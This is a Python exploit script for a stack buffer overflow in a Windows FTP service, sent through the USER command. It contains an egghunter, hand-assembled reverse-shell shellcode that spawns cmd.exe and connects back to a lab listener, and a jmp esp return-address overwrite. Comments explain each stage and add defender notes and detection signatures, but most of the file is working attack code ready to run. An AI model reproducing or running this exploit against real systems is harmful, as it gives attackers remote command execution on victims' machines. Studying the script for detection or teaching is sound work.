#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/05 13:53:58 dhn Exp $

import socket

# egg: GOOD
# First stage: a small egghunter loop.  It walks the process's memory looking
# for the 4-byte tag 0x474f4f44 (little-endian bytes 44 4f 4f 47 = "DOOG",
# hence the "DOOGDOOG" marker that __main__ places in front of `shellcode`)
# occurring twice back-to-back, then jumps to the bytes after it (`jmp edi`).
# `int 0x2e` with eax=2 is used to test whether a page is accessible before
# scanning it; `cmp al, 5` skips pages the probe rejects (the exact syscall
# semantics are not verifiable from this file — see reference [1] below).
# Defender notes: both this byte sequence and the "DOOGDOOG" tag are static
# and make good signatures; an egghunter usually indicates the initial
# overflow slot is too small for the full payload (here 42 bytes in __main__).
egghunter = (
    "\x66\x81\xca\xff\x0f"          # or	dx, 0xfff
    "\x42"                          # inc	edx
    "\x52"                          # push	edx
    "\x6a\x02"                      # push	2
    "\x58"                          # pop	eax
    "\xcd\x2e"                      # int	0x2e
    "\x3c\x05"                      # cmp	al, 5
    "\x5a"                          # pop	edx
    "\x74\xef"                      # je	0x1000
    "\xb8\x44\x4f\x4f\x47"          # mov	eax, 0x474f4f44
    "\x8b\xfa"                      # mov	edi, edx
    "\xaf"                          # scasd	eax, dword ptr es:[edi]
    "\x75\xea"                      # jne	0x1005
    "\xaf"                          # scasd	eax, dword ptr es:[edi]
    "\x75\xe7"                      # jne	0x1005
    "\xff\xe7"                      # jmp	edi
)

# [1] http://shell-storm.org/shellcode/files/shellcode-389.php
# [2] https://github.com/dhn/bin2op
# $ ml /c /coff /Cp /DTEST_CODE shell.asm
# $ link /subsystem:windows /section:.text,w shell.obj 
# $ bin2op.py -i -f shell.exe -l
# Second stage: hand-assembled Windows x86 reverse-shell shellcode.  It is
# placed in the stage-1 buffer behind the "DOOGDOOG" tag and located by the
# egghunter above.  What the disassembly comments show:
#   * a position-independent API resolver (the call/pop prologue through
#     `ret`) that walks the PEB (fs:[0x30]) to a loaded module's export
#     table and compares a per-function hash with the value the caller
#     pushed ([esp+0x24]); every `push <imm32>` + `call edi` below is one
#     such lookup, so no API names appear in the bytes;
#   * library/program names are built on the stack from 4-byte immediates
#     ("ws2_32", "msvcrt", "cmd" — the latter null-terminated by the
#     `inc BYTE PTR [esp+0x3]`), so they are not contiguous strings here;
#   * the callback address is embedded as immediates: LHOST=172.16.133.1,
#     LPORT=6767 (the two annotated pushes); changing the listener means
#     patching those bytes, not __main__;
#   * three stores through a structure reached via fs:[0x18] appear to point
#     the child's standard handles at the socket (presumably
#     ProcessParameters.StandardInput/Output/Error — verify against the
#     source in [1]); the process name pushed afterwards is "cmd".
# Defender notes: static string scanning of the payload will not find
# "ws2_32" or "cmd"; the egghunter tag and the oversized FTP USER argument
# are the usable indicators.  At runtime the tell is the FTP service process
# opening an outbound TCP connection and spawning cmd.exe as a child.
shellcode = (
    "\xeb\x03"                      # jmp    0x401005
    "\x5f"                          # pop    edi
    "\xeb\x55"                      # jmp    0x40105a
    "\xe8\xf8\xff\xff\xff"          # call   0x401002
    "\x60"                          # pusha
    "\x85\xc0"                      # test   eax,eax
    "\x75\x0e"                      # jne    0x40101d
    "\x64\x8b\x40\x30"              # mov    eax,DWORD PTR fs:[eax+0x30]
    "\x8b\x40\x0c"                  # mov    eax,DWORD PTR [eax+0xc]
    "\x8b\x70\x1c"                  # mov    esi,DWORD PTR [eax+0x1c]
    "\xad"                          # lods   eax,DWORD PTR ds:[esi]
    "\x8b\x40\x08"                  # mov    eax,DWORD PTR [eax+0x8]
    "\x8b\xd0"                      # mov    edx,eax
    "\x03\x52\x3c"                  # add    edx,DWORD PTR [edx+0x3c]
    "\x8b\x52\x78"                  # mov    edx,DWORD PTR [edx+0x78]
    "\x03\xd0"                      # add    edx,eax
    "\x8b\x5a\x20"                  # mov    ebx,DWORD PTR [edx+0x20]
    "\x03\xd8"                      # add    ebx,eax
    "\x33\xc9"                      # xor    ecx,ecx
    "\x8b\xe8"                      # mov    ebp,eax
    "\x41"                          # inc    ecx
    "\x8b\x3c\x8b"                  # mov    edi,DWORD PTR [ebx+ecx*4]
    "\x03\xf8"                      # add    edi,eax
    "\x8b\x37"                      # mov    esi,DWORD PTR [edi]
    "\x03\x77\x04"                  # add    esi,DWORD PTR [edi+0x4]
    "\x3b\x74\x24\x24"              # cmp    esi,DWORD PTR [esp+0x24]
    "\x74\x02"                      # je     0x401043
    "\xeb\xed"                      # jmp    0x401030
    "\x8b\x5a\x24"                  # mov    ebx,DWORD PTR [edx+0x24]
    "\x03\xdd"                      # add    ebx,ebp
    "\x66\x8b\x0c\x4b"              # mov    cx,WORD PTR [ebx+ecx*2]
    "\x8b\x5a\x1c"                  # mov    ebx,DWORD PTR [edx+0x1c]
    "\x03\xdd"                      # add    ebx,ebp
    "\x03\x2c\x8b"                  # add    ebp,DWORD PTR [ebx+ecx*4]
    "\x89\x6c\x24\x1c"              # mov    DWORD PTR [esp+0x1c],ebp
    "\x61"                          # popa
    "\xc3"                          # ret
    "\x33\xc0"                      # xor    eax,eax
    "\x33\xc9"                      # xor    ecx,ecx
    "\x68\x98\xd8\xc3\xd6"          # push   0xd6c3d898
    "\xff\xd7"                      # call   edi
    "\x8b\xe8"                      # mov    ebp,eax
    "\x66\x51"                      # push   cx
    "\x66\x68\x33\x32"              # pushw  0x3233
    "\x68\x77\x73\x32\x5f"          # push   0x5f327377
    "\x54"                          # push   esp
    "\xff\xd0"                      # call   eax
    "\x8b\xd8"                      # mov    ebx,eax
    "\x68\xcb\xb4\xb3\xc7"          # push   0xc7b3b4cb
    "\xff\xd7"                      # call   edi
    "\x8b\xf4"                      # mov    esi,esp
    "\x66\x81\xc6\xff\xfc"          # add    si,0xfcff
    "\x56"                          # push   esi
    "\x6a\x02"                      # push   0x2
    "\xff\xd0"                      # call   eax
    "\x8b\xc3"                      # mov    eax,ebx
    "\x68\xc6\xb6\xac\xb8"          # push   0xb8acb6c6
    "\xff\xd7"                      # call   edi
    "\x33\xf6"                      # xor    esi,esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x56"                          # push   esi
    "\x46"                          # inc    esi
    "\x56"                          # push   esi
    "\x46"                          # inc    esi
    "\x56"                          # push   esi
    "\xff\xd0"                      # call   eax
    "\x93"                          # xchg   ebx,eax
    "\x68\xac\x10\x85\x01"          # push   0x18510ac => LHOST=172.16.133.1
    "\x66\x68\x1a\x6f"              # pushw  0x6f1a    => LPORT=6767
    "\x66\x56"                      # push   si
    "\x8b\xf4"                      # mov    esi,esp
    "\x68\xc8\xd2\xe2\x6e"          # push   0x6ee2d2c8
    "\xff\xd7"                      # call   edi
    "\x6a\x10"                      # push   0x10
    "\x56"                          # push   esi
    "\x53"                          # push   ebx
    "\xff\xd0"                      # call   eax
    "\x66\x50"                      # push   ax
    "\x66\x68\x72\x74"              # pushw  0x7472
    "\x68\x6d\x73\x76\x63"          # push   0x6376736d
    "\x54"                          # push   esp
    "\xff\xd5"                      # call   ebp
    "\x68\xd8\xe6\x73\xe8"          # push   0xe873e6d8
    "\xff\xd7"                      # call   edi
    "\x33\xc9"                      # xor    ecx,ecx
    "\x64\x8b\x49\x18"              # mov    ecx,DWORD PTR fs:[ecx+0x18]
    "\x8b\x49\x30"                  # mov    ecx,DWORD PTR [ecx+0x30]
    "\x8b\x49\x10"                  # mov    ecx,DWORD PTR [ecx+0x10]
    "\x89\x59\x18"                  # mov    DWORD PTR [ecx+0x18],ebx
    "\x89\x59\x1c"                  # mov    DWORD PTR [ecx+0x1c],ebx
    "\x89\x59\x20"                  # mov    DWORD PTR [ecx+0x20],ebx
    "\x68\x63\x6d\x64\xff"          # push   0xff646d63
    "\xfe\x44\x24\x03"              # inc    BYTE PTR [esp+0x3]
    "\x54"                          # push   esp
    "\xff\xd0"                      # call   eax
    "\x68\x95\xea\xd8\xd7"          # push   0xd7d8ea95
    "\xff\xd7"                      # call   edi
    "\xff\xd0"                      # call   eax
)

if __name__ == "__main__":
    # Stage-1 buffer layout, from the constants used below (284 bytes up to
    # what is presumably the saved return address):
    #   16 filler | "DOOGDOOG" tag | shellcode | filler to 284
    #   | 4-byte return address | 8 NOPs + egghunter, padded to 42 bytes
    # Total 330 bytes, sent as the argument of a single FTP USER command.
    padding = "A" * 16
    padding += "DOOGDOOG"   # tag the egghunter scans for ("DOOG" twice)
    padding += shellcode
    padding += "A" * (284 - 16 - 8 - len(shellcode))
    # Overwrite value: a `jmp esp` gadget in USER32.dll, typed big-endian and
    # reversed to little-endian.  Gadget addresses are build-specific, so this
    # is tied to the exact environment it was captured from.
    jmp_esp = "\x7E\x42\x93\x53"[::-1] # USER32.dll

    # stage 1
    payload = padding
    payload += jmp_esp
    # After the gadget, esp points at the bytes following the return address:
    # a short NOP sled, then the egghunter, which finds and runs `shellcode`.
    payload += "\x90" * 8 + egghunter + "A" * (42 - len(egghunter) - 8)

    buf = "USER " + payload + "\r\n"

    # Relies on Python 2 `str` being a byte string; target host/port are
    # hard-coded here, while the reverse-shell callback lives inside
    # `shellcode`.  Defender note: a 330-byte USER argument consisting of
    # long "A" runs plus non-printable bytes is far outside any legitimate
    # username and is a straightforward network/IDS signature.
    print("[+] Sending the payload!")
    expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
    expl.connect(("172.16.133.129", 21))
    expl.send(buf)   # single send, no banner read first; one reply consumed
    expl.recv(1024)
    expl.close()
